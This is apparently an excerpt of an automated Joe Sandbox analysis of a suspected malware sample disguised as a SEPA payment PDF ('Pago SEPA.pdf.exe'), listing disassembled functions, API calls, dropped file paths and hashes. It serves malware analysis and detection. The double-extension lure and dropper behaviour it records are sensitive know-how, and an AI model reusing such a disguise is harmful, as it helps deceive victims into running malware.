                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: Processlstrcat$ExitFile$Handle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
                                                                      • String ID: "C:\Users\user\Desktop\Pago SEPA.pdf.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers$C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers$C:\Users\user\Desktop$C:\Users\user\Desktop\Pago SEPA.pdf.exe$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
                                                                      • API String ID: 2251725264-4141526573
                                                                      • Opcode ID: fda6c057a4537dba88034d229a92b30a1776572ee97949e398e0e99b98fea1a3
                                                                      • Instruction ID: 47b2dd04bf5340fec55df09ad24e258ddf9dfe897e1895205e314fce2ef220c4
                                                                      • Opcode Fuzzy Hash: fda6c057a4537dba88034d229a92b30a1776572ee97949e398e0e99b98fea1a3
                                                                      • Instruction Fuzzy Hash: 08D12770604200BAD720BF659D49A3B3AACEB4170AF50487FF441B61D2DB7D9941CB6E
                                                                      Function 004052BD Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 133 4052bd-4052d8 134 405467-40546e 133->134 135 4052de-4053a5 GetDlgItem * 3 call 404118 call 404a1b GetClientRect GetSystemMetrics SendMessageW * 2 133->135 136 405470-405492 GetDlgItem CreateThread CloseHandle 134->136 137 405498-4054a5 134->137 153 4053c3-4053c6 135->153 154 4053a7-4053c1 SendMessageW * 2 135->154 136->137 139 4054c3-4054cd 137->139 140 4054a7-4054ad 137->140 145 405523-405527 139->145 146 4054cf-4054d5 139->146 143 4054e8-4054f1 call 40414a 140->143 144 4054af-4054be ShowWindow * 2 call 404118 140->144 157 4054f6-4054fa 143->157 144->139 145->143 148 405529-40552f 145->148 150 4054d7-4054e3 call 4040bc 146->150 151 4054fd-40550d ShowWindow 146->151 148->143 155 405531-405544 SendMessageW 148->155 150->143 158 40551d-40551e call 4040bc 151->158 159 40550f-405518 call 40517e 151->159 161 4053d6-4053ed call 4040e3 153->161 162 4053c8-4053d4 SendMessageW 153->162 154->153 163 405646-405648 155->163 164 40554a-405575 CreatePopupMenu call 406041 AppendMenuW 155->164 158->145 159->158 172 405423-405444 GetDlgItem SendMessageW 161->172 173 4053ef-405403 ShowWindow 161->173 162->161 163->157 170 405577-405587 GetWindowRect 164->170 171 40558a-40559f TrackPopupMenu 164->171 170->171 171->163 174 4055a5-4055bc 171->174 172->163 177 40544a-405462 SendMessageW * 2 172->177 175 405412 173->175 176 405405-405410 ShowWindow 173->176 178 4055c1-4055dc SendMessageW 174->178 179 405418-40541e call 404118 175->179 176->179 177->163 178->178 180 4055de-405601 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 178->180 179->172 182 405603-40562a SendMessageW 180->182 182->182 183 40562c-405640 GlobalUnlock SetClipboardData CloseClipboard 182->183 183->163
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,00000403), ref: 0040531B
                                                                      • GetDlgItem.USER32(?,000003EE), ref: 0040532A
                                                                      • GetClientRect.USER32(?,?), ref: 00405367
                                                                      • GetSystemMetrics.USER32(00000002), ref: 0040536E
                                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040538F
                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053A0
                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053B3
                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053C1
                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053D4
                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004053F6
                                                                      • ShowWindow.USER32(?,00000008), ref: 0040540A
                                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040542B
                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040543B
                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405454
                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405460
                                                                      • GetDlgItem.USER32(?,000003F8), ref: 00405339
                                                                        • Part of subcall function 00404118: SendMessageW.USER32(00000028,?,00000001,00403F44), ref: 00404126
                                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040547D
                                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00005251,00000000), ref: 0040548B
                                                                      • CloseHandle.KERNELBASE(00000000), ref: 00405492
                                                                      • ShowWindow.USER32(00000000), ref: 004054B6
                                                                      • ShowWindow.USER32(?,00000008), ref: 004054BB
                                                                      • ShowWindow.USER32(00000008), ref: 00405505
                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405539
                                                                      • CreatePopupMenu.USER32 ref: 0040554A
                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040555E
                                                                      • GetWindowRect.USER32(?,?), ref: 0040557E
                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405597
                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055CF
                                                                      • OpenClipboard.USER32(00000000), ref: 004055DF
                                                                      • EmptyClipboard.USER32 ref: 004055E5
                                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004055F1
                                                                      • GlobalLock.KERNEL32(00000000), ref: 004055FB
                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040560F
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040562F
                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 0040563A
                                                                      • CloseClipboard.USER32 ref: 00405640
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                      • String ID: {
                                                                      • API String ID: 590372296-366298937
                                                                      • Opcode ID: da2ca2b418a71cb7626a400892366c561e1cdf4532a0086df1c8728d7d787aa1
                                                                      • Instruction ID: 3cf410e3b9716a944c4f9a47a0d896a4f96f7db2f8ccf501d1eae2c46102dad2
                                                                      • Opcode Fuzzy Hash: da2ca2b418a71cb7626a400892366c561e1cdf4532a0086df1c8728d7d787aa1
                                                                      • Instruction Fuzzy Hash: 85B13A71900208FFDB21AF60DD85AAE7B79FB44355F40803AFA01BA1A0C7755E52DF69
                                                                      Function 00406041 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 207stringCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 428 406041-40604c 429 40604e-40605d 428->429 430 40605f-406075 428->430 429->430 431 40607b-406088 430->431 432 40628d-406293 430->432 431->432 433 40608e-406095 431->433 434 406299-4062a4 432->434 435 40609a-4060a7 432->435 433->432 437 4062a6-4062aa call 40601f 434->437 438 4062af-4062b0 434->438 435->434 436 4060ad-4060b9 435->436 440 40627a 436->440 441 4060bf-4060fb 436->441 437->438 442 406288-40628b 440->442 443 40627c-406286 440->443 444 406101-40610c GetVersion 441->444 445 40621b-40621f 441->445 442->432 443->432 446 406126 444->446 447 40610e-406112 444->447 448 406221-406225 445->448 449 406254-406258 445->449 450 40612d-406134 446->450 447->446 453 406114-406118 447->453 454 406235-406242 call 40601f 448->454 455 406227-406233 call 405f66 448->455 451 406267-406278 lstrlenW 449->451 452 40625a-406262 call 406041 449->452 457 406136-406138 450->457 458 406139-40613b 450->458 451->432 452->451 453->446 461 40611a-40611e 453->461 465 406247-406250 454->465 455->465 457->458 463 406177-40617a 458->463 464 40613d-406163 call 405eec 458->464 461->446 466 406120-406124 461->466 469 40618a-40618d 463->469 470 40617c-406188 GetSystemDirectoryW 463->470 476 406202-406206 464->476 477 406169-406172 call 406041 464->477 465->451 468 406252 465->468 466->450 472 406213-406219 call 4062b3 468->472 474 4061f8-4061fa 469->474 475 40618f-40619d GetWindowsDirectoryW 469->475 473 4061fc-406200 470->473 472->451 473->472 473->476 474->473 478 40619f-4061a9 474->478 475->474 476->472 481 406208-40620e lstrcatW 476->481 477->473 483 4061c3-4061d9 SHGetSpecialFolderLocation 478->483 484 4061ab-4061ae 478->484 481->472 486 4061f4 483->486 487 4061db-4061f2 SHGetPathFromIDListW CoTaskMemFree 483->487 484->483 485 4061b0-4061b7 484->485 489 4061bf-4061c1 485->489 486->474 487->473 487->486 489->473 489->483
                                                                      APIs
                                                                      • GetVersion.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\,?,004051B5,C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\,00000000,00000000,0040FEC0), ref: 00406104
                                                                      • GetSystemDirectoryW.KERNEL32(004271C0,00000400), ref: 00406182
                                                                      • GetWindowsDirectoryW.KERNEL32(004271C0,00000400), ref: 00406195
                                                                      • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004061D1
                                                                      • SHGetPathFromIDListW.SHELL32(?,004271C0), ref: 004061DF
                                                                      • CoTaskMemFree.OLE32(?), ref: 004061EA
                                                                      • lstrcatW.KERNEL32(004271C0,\Microsoft\Internet Explorer\Quick Launch), ref: 0040620E
                                                                      • lstrlenW.KERNEL32(004271C0,00000000,C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\,?,004051B5,C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\,00000000,00000000,0040FEC0), ref: 00406268
                                                                      Strings
                                                                      • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406208
                                                                      • C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\, xrefs: 00406066
                                                                      • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406150
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                      • API String ID: 900638850-757189474
                                                                      • Opcode ID: 2cf121e3e7616b5f5fc1bd3774cadb37834e6b4aa39da4076735cc4ba433a86e
                                                                      • Instruction ID: fd30239bcabdd6b9b5dacf38e9278243e7343c89492a0aeb8152419411716c6f
                                                                      • Opcode Fuzzy Hash: 2cf121e3e7616b5f5fc1bd3774cadb37834e6b4aa39da4076735cc4ba433a86e
                                                                      • Instruction Fuzzy Hash: 70614771A00101ABDF209F64CC40AAE37A5AF51314F12817FE916BA2D1D73D89A2CB5E
                                                                      Function 00405810 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 490 405810-405836 call 405adb 493 405838-40584a DeleteFileW 490->493 494 40584f-405856 490->494 495 4059cc-4059d0 493->495 496 405858-40585a 494->496 497 405869-405879 call 40601f 494->497 498 405860-405863 496->498 499 40597a-40597f 496->499 503 405888-405889 call 405a1f 497->503 504 40587b-405886 lstrcatW 497->504 498->497 498->499 499->495 502 405981-405984 499->502 505 405986-40598c 502->505 506 40598e-405996 call 406362 502->506 508 40588e-405892 503->508 504->508 505->495 506->495 514 405998-4059ac call 4059d3 call 4057c8 506->514 511 405894-40589c 508->511 512 40589e-4058a4 lstrcatW 508->512 511->512 513 4058a9-4058c5 lstrlenW FindFirstFileW 511->513 512->513 515 4058cb-4058d3 513->515 516 40596f-405973 513->516 530 4059c4-4059c7 call 40517e 514->530 531 4059ae-4059b1 514->531 518 4058f3-405907 call 40601f 515->518 519 4058d5-4058dd 515->519 516->499 521 405975 516->521 532 405909-405911 518->532 533 40591e-405929 call 4057c8 518->533 522 405952-405962 FindNextFileW 519->522 523 4058df-4058e7 519->523 521->499 522->515 529 405968-405969 FindClose 522->529 523->518 526 4058e9-4058f1 523->526 526->518 526->522 529->516 530->495 531->505 534 4059b3-4059c2 call 40517e call 405ec0 531->534 532->522 535 405913-40591c call 405810 532->535 543 40594a-40594d call 40517e 533->543 544 40592b-40592e 533->544 534->495 535->522 543->522 545 405930-405940 call 40517e call 405ec0 544->545 546 405942-405948 544->546 545->522 546->522
                                                                      APIs
                                                                      • DeleteFileW.KERNELBASE(?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Pago SEPA.pdf.exe"), ref: 00405839
                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\*.*,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Pago SEPA.pdf.exe"), ref: 00405881
                                                                      • lstrcatW.KERNEL32(?,00409014,?,C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\*.*,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Pago SEPA.pdf.exe"), ref: 004058A4
                                                                      • lstrlenW.KERNEL32(?,?,00409014,?,C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\*.*,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Pago SEPA.pdf.exe"), ref: 004058AA
                                                                      • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\*.*,?,?,?,00409014,?,C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\*.*,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Pago SEPA.pdf.exe"), ref: 004058BA
                                                                      • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,00409300,0000002E), ref: 0040595A
                                                                      • FindClose.KERNELBASE(00000000), ref: 00405969
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                      • String ID: "C:\Users\user\Desktop\Pago SEPA.pdf.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\*.*$\*.*
                                                                      • API String ID: 2035342205-1325715082
                                                                      • Opcode ID: 4fb6421756a88129fd8c5299e0ee644403a5a953871eba58af647f09c9a40e4d
                                                                      • Instruction ID: d8405d9d0b65c0b5bb91e26b2d86fa163654aae1973f92c1c3fedea70a861e09
                                                                      • Opcode Fuzzy Hash: 4fb6421756a88129fd8c5299e0ee644403a5a953871eba58af647f09c9a40e4d
                                                                      • Instruction Fuzzy Hash: EA41F271800A18FACB21BB658C49BBF7A78EB81365F10817BF805711D1C77C4D919EAE
                                                                      Function 004066E3 Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4d5afdfc0dd836d6b0ea96e9b1d1cc0e1a6a0a23e9a334f3c2dfe03cdace4acf
                                                                      • Instruction ID: 25739d06ab219284b51534763859987154442e2999ed31f69dfe775b8bf1d6bb
                                                                      • Opcode Fuzzy Hash: 4d5afdfc0dd836d6b0ea96e9b1d1cc0e1a6a0a23e9a334f3c2dfe03cdace4acf
                                                                      • Instruction Fuzzy Hash: 09F17671D00229CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44
                                                                      Function 00406362 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindFirstFileW.KERNELBASE(75923420,00425758,00424F10,00405B24,00424F10,00424F10,00000000,00424F10,00424F10,75923420,?,C:\Users\user\AppData\Local\Temp\,00405830,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 0040636D
                                                                      • FindClose.KERNEL32(00000000), ref: 00406379
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: Find$CloseFileFirst
                                                                      • String ID: XWB
                                                                      • API String ID: 2295610775-4039527733
                                                                      • Opcode ID: 0fc78072580e2aa021d4eb5561dc00c277e918fd128e5e9fad30f275acd9c25d
                                                                      • Instruction ID: b60ab41fd2821b41d0b392bba1ac2053f61c2dcbfada57179e30504603363e2d
                                                                      • Opcode Fuzzy Hash: 0fc78072580e2aa021d4eb5561dc00c277e918fd128e5e9fad30f275acd9c25d
                                                                      • Instruction Fuzzy Hash: BBD0123194C1209FD3401778BD0C88B7B989B553317214B72FD2AF23E0C3388C6586D9
                                                                      Function 00403C0B Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 184 403c0b-403c1d 185 403c23-403c29 184->185 186 403d5e-403d6d 184->186 185->186 187 403c2f-403c38 185->187 188 403dbc-403dd1 186->188 189 403d6f-403db7 GetDlgItem * 2 call 4040e3 SetClassLongW call 40140b 186->189 190 403c3a-403c47 SetWindowPos 187->190 191 403c4d-403c50 187->191 193 403e11-403e16 call 40412f 188->193 194 403dd3-403dd6 188->194 189->188 190->191 196 403c52-403c64 ShowWindow 191->196 197 403c6a-403c70 191->197 202 403e1b-403e36 193->202 199 403dd8-403de3 call 401389 194->199 200 403e09-403e0b 194->200 196->197 203 403c72-403c87 DestroyWindow 197->203 204 403c8c-403c8f 197->204 199->200 215 403de5-403e04 SendMessageW 199->215 200->193 201 4040b0 200->201 210 4040b2-4040b9 201->210 208 403e38-403e3a call 40140b 202->208 209 403e3f-403e45 202->209 211 40408d-404093 203->211 213 403c91-403c9d SetWindowLongW 204->213 214 403ca2-403ca8 204->214 208->209 218 403e4b-403e56 209->218 219 40406e-404087 DestroyWindow KiUserCallbackDispatcher 209->219 211->201 216 404095-40409b 211->216 213->210 220 403d4b-403d59 call 40414a 214->220 221 403cae-403cbf GetDlgItem 214->221 215->210 216->201 223 40409d-4040a6 ShowWindow 216->223 218->219 224 403e5c-403ea9 call 406041 call 4040e3 * 3 GetDlgItem 218->224 219->211 220->210 225 403cc1-403cd8 SendMessageW IsWindowEnabled 221->225 226 403cde-403ce1 221->226 223->201 254 403eb3-403eef ShowWindow KiUserCallbackDispatcher call 404105 EnableWindow 224->254 255 403eab-403eb0 224->255 225->201 225->226 227 403ce3-403ce4 226->227 228 403ce6-403ce9 226->228 231 403d14-403d19 call 4040bc 227->231 232 403cf7-403cfc 228->232 233 403ceb-403cf1 228->233 231->220 235 403d32-403d45 SendMessageW 232->235 237 403cfe-403d04 232->237 233->235 236 403cf3-403cf5 233->236 235->220 236->231 240 403d06-403d0c call 40140b 237->240 241 403d1b-403d24 call 40140b 237->241 252 403d12 240->252 241->220 250 403d26-403d30 241->250 250->252 252->231 258 403ef1-403ef2 254->258 259 403ef4 254->259 255->254 260 403ef6-403f24 GetSystemMenu EnableMenuItem SendMessageW 258->260 259->260 261 403f26-403f37 SendMessageW 260->261 262 403f39 260->262 263 403f3f-403f7d call 404118 call 40601f lstrlenW call 406041 SetWindowTextW call 401389 261->263 262->263 263->202 272 403f83-403f85 263->272 272->202 273 403f8b-403f8f 272->273 274 403f91-403f97 273->274 275 403fae-403fc2 DestroyWindow 273->275 274->201 276 403f9d-403fa3 274->276 275->211 277 403fc8-403ff5 CreateDialogParamW 275->277 276->202 278 403fa9 276->278 277->211 279 403ffb-404052 call 4040e3 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 277->279 278->201 279->201 284 404054-404067 ShowWindow call 40412f 279->284 286 40406c 284->286 286->211
                                                                      APIs
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C47
                                                                      • ShowWindow.USER32(?), ref: 00403C64
                                                                      • DestroyWindow.USER32 ref: 00403C78
                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403C94
